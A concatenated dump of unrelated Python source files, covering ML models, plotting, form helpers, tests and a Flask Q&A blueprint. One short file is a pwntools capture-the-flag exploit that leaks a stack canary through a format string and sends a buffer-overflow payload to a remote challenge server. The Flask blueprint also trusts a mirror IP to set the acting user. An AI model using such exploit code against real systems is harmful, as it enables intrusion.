cluster_composition.add_argument("--autoscaling-nodes-preemptible",
dest="autoscaling_nodes_preemptible",
action="store_true",
default=None,
help="if the autoscaling nodes are preemptible")
cluster_composition.add_argument("--autoscaling-nodes-preemptible-percentage",
dest="autoscaling_nodes_preemptible_percentage",
type=int,
default=None,
help="percentage of autoscaling nodes that are preemptible")
|
105944
|
import jinja2
from lib.notify.all_notifiers import get_notifier_class, DEFAULT_NOTIFIER
from logic import user as user_logic
from app.db import with_session
@with_session
def notify_user(user, template_name, template_params, notifier_name=None, session=None):
if notifier_name is None:
notification_preference = user_logic.get_user_settings(
user.id, "notification_preference", session=session
)
notifier_name = (
notification_preference.value
if notification_preference is not None
else DEFAULT_NOTIFIER
)
if notifier_name is None:
return
notifier = get_notifier_class(notifier_name)
markdown_message = render_message(template_name, template_params)
notifier.notify(user=user, message=markdown_message)
def render_message(template_name, context):
jinja_env = jinja2.Environment(
loader=jinja2.FileSystemLoader("./querybook/notification_templates/")
)
template = jinja_env.get_template(f"{template_name}.md")
return template.render(context)
|
105950
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .base import * # pylint: disable=wildcard-import
from .grid_search import * # pylint: disable=wildcard-import
|
105972
|
import os
import sys
sys.path.append('../')
import numpy as np
import xarray as xr
import matplotlib.pyplot as plt
import cartopy
import cartopy.crs as ccrs
import pygsp as pg
from modules.my_io import readDatasets
from modules import xsphere
# Plotting options
import matplotlib
matplotlib.use('cairo') # Cairo
matplotlib.rcParams["figure.facecolor"] = "white"
matplotlib.rcParams["savefig.facecolor"] = "white" # (1,1,1,0)
matplotlib.rcParams["savefig.edgecolor"] = 'none'
##-----------------------------------------------------------------------------.
# Define directories
data_dir = "/data/weather_prediction/data"
figs_dir = "/data/weather_prediction/figs"
##-----------------------------------------------------------------------------.
# Define samplings
sampling_names = [
# 400 km
'Healpix_400km',
'Icosahedral_400km',
'Cubed_400km',
'O24',
'Equiangular_400km',
]
# Define samplings title
samplings_labels_dict = {
# 400 km
'Healpix_400km': 'Healpix',
'Icosahedral_400km': 'Icosahedral' ,
'Cubed_400km' : 'Cubed Sphere',
'O24' : 'Reduced Gaussian Grid',
'Equiangular_400km' : 'Equiangular Grid',
}
# Define reference and projection CRS
crs_ref = ccrs.Geodetic()
crs_proj = ccrs.Orthographic(central_longitude=0.0, central_latitude=90.0) # from the North Pole
##----------------------------------------------------------------------------.
### Plot meshes
fig, axes = plt.subplots(2, 3, subplot_kw=dict(projection=crs_proj), figsize=(12,10))
for ax, sampling_name in zip(axes.flat, sampling_names):
# Load netCDF4 Datasets
data_sampling_dir = os.path.join(data_dir, sampling_name)
ds = readDatasets(data_dir=data_sampling_dir, feature_type='static')
ds = ds.sphere.add_SphericalVoronoiMesh(x='lon',y='lat')
# Plot mesh
ds.sphere.plot_mesh(ax = ax,
transform = crs_ref,
add_background = True,
antialiaseds = True,
facecolors = 'none',
edgecolors = "black",
linewidths = 0.5,
alpha = 0.8)
ax.set_title(samplings_labels_dict[sampling_name])
fig.tight_layout()
fig.savefig(os.path.join(figs_dir, "Meshes.png"))
##----------------------------------------------------------------------------.
|
105978
|
from formation import fields as F
from formation.field_types import MultiValueField
from formation.fields import get_field_index
from formation.form_base import Form
from formation.forms import county_form_selector
EDITABLE_FIELDS = {
F.ContactPreferences,
F.FirstName,
F.MiddleName,
F.LastName,
F.Aliases,
F.PhoneNumberField,
F.AlternatePhoneNumberField,
F.AddressField,
F.DriverLicenseOrIDNumber,
F.EmailField,
F.DateOfBirthField,
F.SocialSecurityNumberField,
}
SENSITIVE_FIELD_LABELS = (
F.SocialSecurityNumberField().get_display_label(),
F.DriverLicenseOrIDNumber().get_display_label(),
)
def get_edit_form_class_for_user_and_submission(user, submission):
# get all orgs for submissison
all_county_slugs = submission.organizations.values_list(
'county__slug', flat=True)
# get combined form spec for all orgs
all_county_form_spec = county_form_selector.get_combined_form_spec(
counties=all_county_slugs)
county_field_set = all_county_form_spec.fields
if not user.is_staff:
user_county_slug = user.profile.organization.county.slug
user_county_spec = county_form_selector.get_combined_form_spec(
counties=[user_county_slug])
county_field_set = user_county_spec.fields
form_field_set = county_field_set & EDITABLE_FIELDS
form_fields = sorted(list(form_field_set), key=get_field_index)
# get union of required fields from all form specs
# this, intersected with form_fields, is the set of required fields for
# our form
required_fields = list(
all_county_form_spec.required_fields & form_field_set)
parent_classes = (Form,)
class_attributes = dict(
fields=form_fields,
required_fields=required_fields,
validators=list(all_county_form_spec.validators))
return type('CombinedEditForm', parent_classes, class_attributes)
def get_changed_data_from_form(form):
"""Returns a dictionary with keys of all changed fields
and values that are a dict with 'before' and 'after' keys
values of 'before' and 'after' are display values
for example:
{
'First name': {
'before': 'George',
'after': 'Jorge'
},
'Date of birth': {
'before': 'February/6/1791',
'after': '2/6/1791'}
}
}
Expects fields prefixed with 'existing_' in order to make that comparison
"""
changes = {}
existing_data_form = form.__class__(
form.raw_input_data, prefix='existing_', validate=True,
skip_validation_parse_only=True)
for field in form.iter_fields():
after = field.get_display_value()
existing_data_field = existing_data_form.fields[field.context_key]
before = existing_data_field.get_display_value()
if before != after:
changes[field.get_display_label()] = {
'before': before,
'after': after}
return changes
|
105979
|
from pwn import *
elf=ELF('./binary_200')
#remote server has no elf named binary_200, so we load local elf
r=remote('bamboofox.cs.nctu.edu.tw',22002)
print 'start'
#r=process('./binary_200')
sysadr=elf.symbols['canary_protect_me']
#use gdb to justify canary in args of printf
r.sendline('%15$08x')
print 'leak canary start'
canary=r.recv()[:8]
print 'Canary is 0x'+canary
#Bypass canary leaked and attack the stack
payload='A'*(0x2c-0x4)+canary.decode("hex")[::-1]+'a'*0xc+p32(sysadr)
r.sendline(payload)
r.interactive()
|
105995
|
from collections import namedtuple
def _namedtuple(typename, field_names):
"""Fixes hashing for different tuples with same content
"""
base = namedtuple(typename, field_names)
def __hash__(self):
return hash((self.__class__, super(base, self).__hash__()))
return type(typename, (base,), {
'__slots__': (),
'__hash__': __hash__,
})
SCALAR = _namedtuple('SCALAR', 'name')
OBJECT = _namedtuple('OBJECT', 'name')
DIRECTIVE = _namedtuple('DIRECTIVE', 'name')
INPUT_OBJECT = _namedtuple('INPUT_OBJECT', 'name')
LIST = _namedtuple('LIST', 'of_type')
NON_NULL = _namedtuple('NON_NULL', 'of_type')
FieldIdent = _namedtuple('FieldIdent', 'node, name')
FieldArgIdent = _namedtuple('FieldArgIdent', 'node, field, name')
InputObjectFieldIdent = _namedtuple('InputObjectFieldIdent', 'name, key')
DirectiveArgIdent = _namedtuple('DirectiveArgIdent', 'name, arg')
|
106000
|
import torch
import torch.nn as nn
import numpy as np
import torch.nn.functional as F
__all__ = ['FixupResNet', 'fixup_resnet18', 'fixup_resnet34', 'fixup_resnet50', 'fixup_resnet101', 'fixup_resnet152']
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def conv5x5(in_planes, out_planes, stride=1):
"""5x5 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=5, stride=stride,
padding=2, bias=False)
def conv7x7(in_planes, out_planes, stride=1):
"""7x7 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=7, stride=stride,
padding=3, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class FixupBasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, conv_create=conv3x3):
super(FixupBasicBlock, self).__init__()
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.bias1a = nn.Parameter(torch.zeros(1))
self.conv1 = conv_create(inplanes, planes, stride)
self.bias1b = nn.Parameter(torch.zeros(1))
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
self.bias2a = nn.Parameter(torch.zeros(1))
self.conv2 = conv_create(planes, planes)
self.scale = nn.Parameter(torch.ones(1))
self.bias2b = nn.Parameter(torch.zeros(1))
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x + self.bias1a)
out = self.lrelu(out + self.bias1b)
out = self.conv2(out + self.bias2a)
out = out * self.scale + self.bias2b
if self.downsample is not None:
identity = self.downsample(x + self.bias1a)
out += identity
out = self.lrelu(out)
return out
class FixupResNet(nn.Module):
def __init__(self, block, layers, upscale_applications=2, num_filters=64, inject_noise=False):
super(FixupResNet, self).__init__()
self.inject_noise = inject_noise
self.num_layers = sum(layers) + layers[-1] * (upscale_applications - 1) # The last layer is applied repeatedly to achieve high level SR.
self.inplanes = num_filters
self.upscale_applications = upscale_applications
# Part 1 - Process raw input image. Most denoising should appear here and this should be the most complicated
# part of the block.
self.conv1 = nn.Conv2d(3, num_filters, kernel_size=5, stride=1, padding=2,
bias=False)
self.bias1 = nn.Parameter(torch.zeros(1))
self.lrelu = nn.LeakyReLU(negative_slope=0.2, inplace=True)
self.layer1 = self._make_layer(block, num_filters, layers[0], stride=1)
self.skip1 = nn.Conv2d(num_filters, 3, kernel_size=5, stride=1, padding=2, bias=False)
self.skip1_bias = nn.Parameter(torch.zeros(1))
# Part 2 - This is the upsampler core. It consists of a normal multiplicative conv followed by several residual
# convs which are intended to repair artifacts caused by 2x interpolation.
# This core layer should by itself accomplish 2x super-resolution. We use it in repeat to do the
# requested SR.
self.nf2 = int(num_filters/4)
# This part isn't repeated. It de-filters the output from the previous step to fit the filter size used in the
# upsampler-conv.
self.upsampler_conv = nn.Conv2d(num_filters, self.nf2, kernel_size=3, stride=1, padding=1, bias=False)
self.uc_bias = nn.Parameter(torch.zeros(1))
self.inplanes = self.nf2
if layers[1] > 0:
# This is the repeated part.
self.layer2 = self._make_layer(block, int(self.nf2), layers[1], stride=1, conv_type=conv5x5)
self.skip2 = nn.Conv2d(self.nf2, 3, kernel_size=5, stride=1, padding=2, bias=False)
self.skip2_bias = nn.Parameter(torch.zeros(1))
self.final_defilter = nn.Conv2d(self.nf2, 3, kernel_size=5, stride=1, padding=2, bias=True)
self.bias2 = nn.Parameter(torch.zeros(1))
for m in self.modules():
if isinstance(m, FixupBasicBlock):
nn.init.normal_(m.conv1.weight, mean=0, std=np.sqrt(2 / (m.conv1.weight.shape[0] * np.prod(m.conv1.weight.shape[2:]))) * self.num_layers ** (-0.5))
nn.init.constant_(m.conv2.weight, 0)
if m.downsample is not None:
nn.init.normal_(m.downsample.weight, mean=0, std=np.sqrt(2 / (m.downsample.weight.shape[0] * np.prod(m.downsample.weight.shape[2:]))))
def _make_layer(self, block, planes, blocks, stride=1, conv_type=conv3x3):
defilter = None
if self.inplanes != planes * block.expansion:
defilter = conv1x1(self.inplanes, planes * block.expansion, stride)
layers = []
layers.append(block(self.inplanes, planes, stride, defilter))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, conv_create=conv_type))
return nn.Sequential(*layers)
def forward(self, x):
if self.inject_noise:
rand_feature = torch.randn_like(x)
x = x + rand_feature * .1
x = self.conv1(x)
x = self.lrelu(x + self.bias1)
x = self.layer1(x)
skip_lo = self.skip1(x) + self.skip1_bias
x = self.lrelu(self.upsampler_conv(x) + self.uc_bias)
if self.upscale_applications > 0:
x = F.interpolate(x, scale_factor=2.0, mode='nearest')
x = self.layer2(x)
skip_med = self.skip2(x) + self.skip2_bias
else:
skip_med = skip_lo
if self.upscale_applications > 1:
x = F.interpolate(x, scale_factor=2.0, mode='nearest')
x = self.layer2(x)
x = self.final_defilter(x) + self.bias2
return x, skip_med, skip_lo
class FixupResNetV2(FixupResNet):
def __init__(self, **kwargs):
super(FixupResNetV2, self).__init__(**kwargs)
# Use one unified filter-to-image stack, not the previous skip stacks.
self.skip1 = None
self.skip1_bias = None
self.skip2 = None
self.skip2_bias = None
# The new filter-to-image stack will be 2 conv layers deep, not 1.
self.final_process = nn.Conv2d(self.nf2, self.nf2, kernel_size=5, stride=1, padding=2, bias=True)
self.bias2 = nn.Parameter(torch.zeros(1))
self.fp_bn = nn.BatchNorm2d(self.nf2)
self.final_defilter = nn.Conv2d(self.nf2, 3, kernel_size=3, stride=1, padding=1, bias=True)
self.bias3 = nn.Parameter(torch.zeros(1))
def filter_to_image(self, filter):
x = self.final_process(filter) + self.bias2
x = self.lrelu(self.fp_bn(x))
x = self.final_defilter(x) + self.bias3
return x
def forward(self, x):
if self.inject_noise:
rand_feature = torch.randn_like(x)
x = x + rand_feature * .1
x = self.conv1(x)
x = self.lrelu(x + self.bias1)
x = self.layer1(x)
x = self.lrelu(self.upsampler_conv(x) + self.uc_bias)
skip_lo = self.filter_to_image(x)
if self.upscale_applications > 0:
x = F.interpolate(x, scale_factor=2.0, mode='nearest')
x = self.layer2(x)
skip_med = self.filter_to_image(x)
if self.upscale_applications > 1:
x = F.interpolate(x, scale_factor=2.0, mode='nearest')
x = self.layer2(x)
if self.upscale_applications == 2:
x = self.filter_to_image(x)
elif self.upscale_applications == 1:
x = skip_med
skip_med = skip_lo
skip_lo = None
elif self.upscale_applications == 0:
x = skip_lo
skip_lo = None
skip_med = None
return x, skip_med, skip_lo
def fixup_resnet34(nb_denoiser=20, nb_upsampler=10, **kwargs):
"""Constructs a Fixup-ResNet-34 model.
"""
model = FixupResNet(FixupBasicBlock, [nb_denoiser, nb_upsampler], **kwargs)
return model
def fixup_resnet34_v2(nb_denoiser=20, nb_upsampler=10, **kwargs):
"""Constructs a Fixup-ResNet-34 model.
"""
kwargs['block'] = FixupBasicBlock
kwargs['layers'] = [nb_denoiser, nb_upsampler]
model = FixupResNetV2(**kwargs)
return model
__all__ = ['FixupResNet', 'fixup_resnet34', 'fixup_resnet34_v2']
|
106060
|
import logging
import psutil
from icrawl_plugin import IHostCrawler
from utils.features import CpuFeature
logger = logging.getLogger('crawlutils')
class CpuHostCrawler(IHostCrawler):
def get_feature(self):
return 'cpu'
def crawl(self, **kwargs):
logger.debug('Crawling %s' % (self.get_feature()))
for (idx, cpu) in enumerate(psutil.cpu_times_percent(percpu=True)):
feature_attributes = CpuFeature(
cpu.idle,
cpu.nice,
cpu.user,
cpu.iowait,
cpu.system,
cpu.irq,
cpu.steal,
100 - int(cpu.idle),
)
feature_key = '{0}-{1}'.format('cpu', idx)
yield (feature_key, feature_attributes, 'cpu')
|
106077
|
import unittest
from collections import namedtuple
from operator import attrgetter, itemgetter
from foil.order import partition_ordered, partition
MockTuple = namedtuple('MockTuple', ('a', 'b'))
def is_even(x):
return True if x % 2 == 0 else False
class TestPartitionOrdered(unittest.TestCase):
def test_partition_by_attribute(self):
data = [{'a': 5, 'b': 8}, {'a': 5, 'b': 7}, {'a': 4, 'b': 4}]
tups = [MockTuple(**d) for d in data]
expected = [(5, [MockTuple(a=5, b=8), MockTuple(a=5, b=7)]),
(4, [MockTuple(a=4, b=4)])]
result = list(partition_ordered(tups, key=attrgetter('a')))
self.assertSequenceEqual(expected, result)
def test_partition_by_item(self):
data = ['123', '234', '221', '210', '780', '822']
expected = [('1', ['123']),
('2', ['234', '221', '210']),
('7', ['780']),
('8', ['822'])]
result = list(partition_ordered(data, key=itemgetter(0)))
self.assertEqual(expected, result)
class TestPartition(unittest.TestCase):
def test_partition(self):
expected_true = [0, 2]
expected_false = [1, 3]
result_false, result_true = partition(is_even, range(0, 4))
self.assertEqual(expected_true, list(result_true))
self.assertEqual(expected_false, list(result_false))
|
106098
|
import pytest
from copy import deepcopy
from unittest.mock import patch
from pycliarr.api.radarr import RadarrCli, RadarrMovieItem
from pycliarr.api.exceptions import RadarrCliError
TEST_ROOT_PATH = [{"path": "some/path/", "id": 1},{"path": "yet/otherpath/", "id": 3}]
TEST_JSON = {'somefield': "some value"}
TEST_MOVIE = {'title': "some movie", "year": 2020}
TEST_HOST = "http://example.com"
TEST_APIKEY = "<KEY>"
TEST_MOVIEINFO = {
"title": "some movie",
"sortTitle": "",
"sizeOnDisk": 0,
"overview": "",
"inCinemas": None,
"physicalRelease": None,
"status": "",
"images": [],
"website": "",
"downloaded": False,
"year": 0,
"hasFile": False,
"youTubeTrailerId": "",
"studio": "",
"path": "",
"rootFolderPath": "",
"profileId": 0,
"monitored": True,
"minimumAvailability": "",
"isAvailable": "",
"folderName": "",
"runtime": 0,
"cleanTitle": "",
"imdbId": "",
"tmdbId": 0,
"titleSlug": "",
"certification": "",
"genres": [],
"tags": [],
"added": None,
"ratings": {},
"collection": {},
"alternativeTitles": [],
"qualityProfileId": 0,
"id": 0,
}
@pytest.fixture
def cli():
return RadarrCli(TEST_HOST, TEST_APIKEY)
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_item", return_value=TEST_MOVIE)
def test_get_movie(mock_base, cli):
res = cli.get_movie()
mock_base.assert_called_with(None)
assert res.title == "some movie"
assert res.year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_item", return_value=[TEST_MOVIE])
def test_get_movie_with_id(mock_base, cli):
res = cli.get_movie(movie_id=1234)
mock_base.assert_called_with(1234)
assert res[0].title == "some movie"
assert res[0].year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.lookup_item", return_value=[TEST_MOVIE, TEST_MOVIE])
def test_lookup_movie_with_term(mock_base, cli):
res = cli.lookup_movie(term="some title")
mock_base.assert_called_with("some title")
assert res[0].title == "some movie"
assert res[0].year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.lookup_item", return_value=[TEST_MOVIE])
def test_lookup_movie_with_term_single_res(mock_base, cli):
res = cli.lookup_movie(term="some title")
mock_base.assert_called_with("some title")
assert res.title == "some movie"
assert res.year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIE)
def test_lookup_movie_with_imdb(mock_base, cli):
res = cli.lookup_movie(imdb_id="tt1234")
mock_base.assert_called_with(f"{cli.api_url_itemlookup}/imdb", url_params={"imdbId": "tt1234"})
assert res.title == "some movie"
assert res.year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIE)
def test_lookup_movie_with_tmdb(mock_base, cli):
res = cli.lookup_movie(tmdb_id=1234)
mock_base.assert_called_with(f"{cli.api_url_itemlookup}/tmdb", url_params={"tmdbId": 1234})
assert res.title == "some movie"
assert res.year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIE)
def test_lookup_movie_with_all(mock_base, cli):
res = cli.lookup_movie(term="some title", tmdb_id=1234, imdb_id="tt1234")
mock_base.assert_called_with(f"{cli.api_url_itemlookup}/tmdb", url_params={"tmdbId": 1234})
assert res.title == "some movie"
assert res.year == 2020
def test_lookup_movie_with_noparam(cli):
with pytest.raises(RadarrCliError):
cli.lookup_movie()
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_root_folder", return_value=TEST_ROOT_PATH)
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIEINFO)
@patch("pycliarr.api.radarr.BaseCliMediaApi.add_item", return_value=TEST_JSON)
def test_add_movie_withpath(mock_add, mock_root, mock_get, cli):
exp = deepcopy(TEST_MOVIEINFO)
exp.update({
"title": "some movie",
"path": "some/other_path/some_other_movie",
"profileId": 1,
"qualityProfileId": 1,
"monitored": True,
"addOptions": {"searchForMovie": True}
})
cli.add_movie(quality=1, tmdb_id=1234, path="some/other_path/some_other_movie")
mock_add.assert_called_with(json_data=exp)
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_root_folder", return_value=TEST_ROOT_PATH)
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIEINFO)
@patch("pycliarr.api.radarr.BaseCliMediaApi.add_item", return_value=TEST_JSON)
def test_add_movie_withtmdb(mock_add, mock_root, mock_get, cli):
exp = deepcopy(TEST_MOVIEINFO)
exp.update({
"title": "some movie",
"path": "some/path/some movie",
"profileId": 1,
"qualityProfileId": 1,
"monitored": True,
"addOptions": {"searchForMovie": True}
})
cli.add_movie(quality=1, tmdb_id=1234)
mock_add.assert_called_with(json_data=exp)
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_root_folder", return_value=TEST_ROOT_PATH)
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIEINFO)
@patch("pycliarr.api.radarr.BaseCliMediaApi.add_item", return_value=TEST_JSON)
def test_add_movie_withimdb(mock_add, mock_root, mock_get, cli):
exp = deepcopy(TEST_MOVIEINFO)
exp.update({
"title": "some movie",
"path": "some/path/some movie",
"profileId": 2,
"qualityProfileId": 2,
"monitored": True,
"addOptions": {"searchForMovie": True}
})
cli.add_movie(quality=2, imdb_id="tt1234")
mock_add.assert_called_with(json_data=exp)
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_root_folder", return_value=TEST_ROOT_PATH)
@patch("pycliarr.api.radarr.BaseCliMediaApi.add_item", return_value=TEST_JSON)
def test_add_movie_withinfo(mock_add, mock_root, cli):
exp = deepcopy(TEST_MOVIEINFO)
exp.update({
"title": "some movie",
"path": "some/path/some movie",
"profileId": 1,
"qualityProfileId": 1,
"monitored": False,
"addOptions": {"searchForMovie": False}
})
info = RadarrMovieItem(title="some movie")
cli.add_movie(quality=1, movie_info=info, monitored=False, search=False)
mock_add.assert_called_with(json_data=exp)
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value={})
def test_add_movie_noresults(mock_get, cli):
with pytest.raises(RadarrCliError):
cli.add_movie(quality=2, imdb_id="tt1234")
def test_add_movie_noparam(cli):
with pytest.raises(RadarrCliError):
cli.add_movie(quality=2)
@patch("pycliarr.api.radarr.BaseCliMediaApi.delete_item", return_value=TEST_JSON)
def test_delete_movie(mock_base, cli):
res = cli.delete_movie(1234)
mock_base.assert_called_with(1234, True, {})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi.delete_item", return_value=TEST_JSON)
def test_delete_movie_withoptions(mock_base, cli):
res = cli.delete_movie(1234, delete_files=False, add_exclusion=True)
mock_base.assert_called_with(1234, False, {"addExclusion": True})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi._sendCommand", return_value=TEST_JSON)
def test_refresh_movies(mock_base, cli):
res = cli.refresh_movie()
mock_base.assert_called_with({"name": "RefreshMovie"})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi._sendCommand", return_value=TEST_JSON)
def test_refresh_movie(mock_base, cli):
res = cli.refresh_movie(1234)
mock_base.assert_called_with({"name": "RefreshMovie", "movieId": 1234})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi._sendCommand", return_value=TEST_JSON)
def test_rescan_movies(mock_base, cli):
res = cli.rescan_movie()
mock_base.assert_called_with({"name": "RescanMovie"})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi._sendCommand", return_value=TEST_JSON)
def test_rescan_movie(mock_base, cli):
res = cli.rescan_movie(1234)
mock_base.assert_called_with({"name": "RescanMovie", "movieId": 1234})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi.build_item_path")
def test_build_movie_path_no_year(mock_buildpath, cli):
movie = RadarrMovieItem(title="some movie", year=0)
cli.build_movie_path(movie)
mock_buildpath.assert_called_with("some movie")
@patch("pycliarr.api.radarr.BaseCliMediaApi.build_item_path")
def test_build_movie_path_year(mock_buildpath, cli):
movie = RadarrMovieItem(title="some movie", year=2020)
cli.build_movie_path(movie, root_folder_id=3)
mock_buildpath.assert_called_with("some movie (2020)")
|
106113
|
from sqlalchemy import and_, or_, func
from datetime import datetime
from flask import Blueprint, request, make_response, render_template, flash, g, session, redirect, url_for, jsonify, abort, current_app
from flask.ext.babel import gettext
from dataviva import db, lm, view_cache
# from config import SITE_MIRROR
from dataviva.apps.user.models import User
from dataviva.apps.ask.models import Question, Reply, Status, Vote, TYPE_QUESTION, TYPE_REPLY, Flag
from dataviva.apps.ask.forms import AskForm, ReplyForm, SearchForm
from dataviva.utils.cached_query import cached_query, api_cache_key
import urllib2, urllib
mod = Blueprint('ask', __name__, url_prefix='/<lang_code>/ask')
RESULTS_PER_PAGE = 10
@mod.url_defaults
def add_language_code(endpoint, values):
values.setdefault('lang_code', g.locale)
@mod.url_value_preprocessor
def pull_lang_code(endpoint, values):
g.locale = values.pop('lang_code')
@mod.route('/questions/', methods=['GET', 'POST'], defaults={'page': 1})
def question_list(page):
# get URL parameters for results per page and ordering options
order = request.args.get('order', 'votes') # options = 'votes' or 'newest'
type = request.args.get('type', 'all') # options = 'all' or 'question' or 'comment' or 'contact'
offset = request.args.get('offset', 0)
search_term = request.args.get('q', None)
if search_term:
search_term = search_term.encode('utf-8')
limit = 25
lang = request.args.get('lang', None) or g.locale
# lets find the questions to load in the page
# only the approved questions
approved = Status.query.filter_by(name='Approved').first()
questions = Question.query.filter_by(status = approved)
# if the user has submitted a search, filter by that term
if search_term:
like_str = "%{0}%".format(search_term)
questions = questions.filter(or_(Question.question.like(like_str),Question.body.like(like_str),Question.status_notes.like(like_str)))
if type == "question":
questions = questions.filter_by(type_id='1')
elif type == "comment":
questions = questions.filter_by(type_id='2')
elif type == "contact":
questions = questions.filter_by(type_id='3')
# if we are ordering the questions by newest get them ordered chronologically
if order == "newest":
if g.locale == "pt":
questions = questions.order_by(Question.timestamp.desc(),Question.language.desc())
else:
questions = questions.order_by(Question.timestamp.desc(),Question.language)
questions = questions.order_by(Question.timestamp.desc())
questions = questions.limit(limit).offset(offset)
questions = [q.serialize() for q in questions.all()]
# otherwise we are ordering the questions by votes
else:
questions = questions.limit(limit).offset(offset)
ids = [q.id for q in questions]
# raise Exception(ids)
votes_subq = db.session.query(Vote, func.count('*').label('vote_count')).group_by(Vote.type_id).subquery()
if lang == "pt":
questions = db.session.query(Question, votes_subq.c.vote_count) \
.outerjoin(votes_subq, and_(Question.id==votes_subq.c.type_id, votes_subq.c.type==TYPE_QUESTION)) \
.filter(Question.status == approved) \
.filter(Question.id.in_(ids)) \
.filter(Question.language==lang) \
.order_by(votes_subq.c.vote_count.desc(),Question.language.desc())
else:
questions = db.session.query(Question, votes_subq.c.vote_count) \
.outerjoin(votes_subq, and_(Question.id==votes_subq.c.type_id, votes_subq.c.type==TYPE_QUESTION)) \
.filter(Question.status == approved) \
.filter(Question.id.in_(ids)) \
.filter(Question.language==lang) \
.order_by(votes_subq.c.vote_count.desc(),Question.language)
# .limit(limit).offset(offset)
questions = [q[0].serialize() for q in questions]
ret = jsonify({"activities":questions})
ret.headers.add('Last-Modified', datetime.now())
ret.headers.add('Expires', '-1')
ret.headers.add('Cache-Control', 'must-revalidate, private')
return ret
@mod.route('/question/<slug>/vote/')
@mod.route('/question/<slug>/vote/<user>/')
def question_vote(slug, user=None):
q = Question.query.filter_by(slug=slug).first_or_404()
if user and request.remote_addr == SITE_MIRROR.split(":")[1][2:]:
g.user = User.query.get(user)
elif g.user is None or not g.user.is_authenticated:
return jsonify({"error": gettext("You need to be logged in to vote.")})
elif user is None and g.user is None:
abort(404)
# if user is None:
# try:
# opener = urllib2.urlopen("{0}ask/question/{1}/vote/{2}/".format(SITE_MIRROR,slug,g.user.id),None,5)
# except:
# return jsonify({"error": gettext("The server is not responding. Please try again later.")})
vote = q.votes.filter_by(user=g.user).first()
if vote:
db.session.delete(vote)
db.session.commit()
return jsonify({"success": -1})
else:
new_vote = Vote(user=g.user, type=TYPE_QUESTION, type_id=q.id)
db.session.add(new_vote)
db.session.commit()
return jsonify({"success": 1})
@mod.route('/reply/<int:id>/vote/')
@mod.route('/reply/<int:id>/vote/<user>/')
def reply_vote(id, user=None):
reply = Reply.query.get_or_404(id)
# if user and request.remote_addr == SITE_MIRROR.split(":")[1][2:]:
# g.user = User.query.get(user)
if g.user is None or not g.user.is_authenticated:
return jsonify({"error": gettext("You need to be logged in to vote.")})
# elif user is None and g.user is None:
# abort(404)
# if user is None:
# try:
# opener = urllib2.urlopen("{0}ask/reply/{1}/vote/{2}/".format(SITE_MIRROR,id,g.user.id),None,5)
# except:
# return jsonify({"error": gettext("The server is not responding. Please try again later.")})
vote = reply.votes.filter_by(user=g.user).first()
if vote:
db.session.delete(vote)
db.session.commit()
return jsonify({"success": -1})
else:
new_vote = Vote(user=g.user, type=TYPE_REPLY, type_id=reply.id)
db.session.add(new_vote)
db.session.commit()
return jsonify({"success": 1})
@mod.route('/reply/<int:id>/flag/')
@mod.route('/reply/<int:id>/flag/<user>/')
def reply_flag(id, user=None):
reply = Reply.query.get_or_404(id)
# if user and request.remote_addr == SITE_MIRROR.split(":")[1][2:]:
# g.user = User.query.get(user)
if g.user is None or not g.user.is_authenticated:
return jsonify({"error": gettext("You need to be logged in to flag replies.")})
# elif user is None and g.user is None:
# abort(404)
# if user is None:
# try:
# opener = urllib2.urlopen("{0}ask/reply/{1}/flag/{2}/".format(SITE_MIRROR,id,g.user.id),None,5)
# except:
# return jsonify({"error": gettext("The server is not responding. Please try again later.")})
flag = reply.flags.filter_by(user=g.user).first()
if flag:
db.session.delete(flag)
db.session.commit()
return jsonify({"success": -1})
else:
new_flag = Flag(user=g.user, reply_id=reply.id)
db.session.add(new_flag)
db.session.commit()
return jsonify({"success": 1})
|
106117
|
import random
import torch
from tensorboardX import SummaryWriter
from plotting_utils import plot_alignment_to_numpy, plot_spectrogram_to_numpy
from plotting_utils import plot_gate_outputs_to_numpy
class Tacotron2Logger(SummaryWriter):
def __init__(self, logdir, hparams):
super(Tacotron2Logger, self).__init__(logdir)
self.n_items = hparams.n_tensorboard_outputs
self.plotted_targets_val = False# validation/teacher-forcing
self.plotted_targets_inf = False# infer
self.best_loss_dict = None
def plot_loss_dict(self, loss_dict, iteration, prepend=''):
# plot datapoints/graphs
for loss_name, reduced_loss in loss_dict.items():
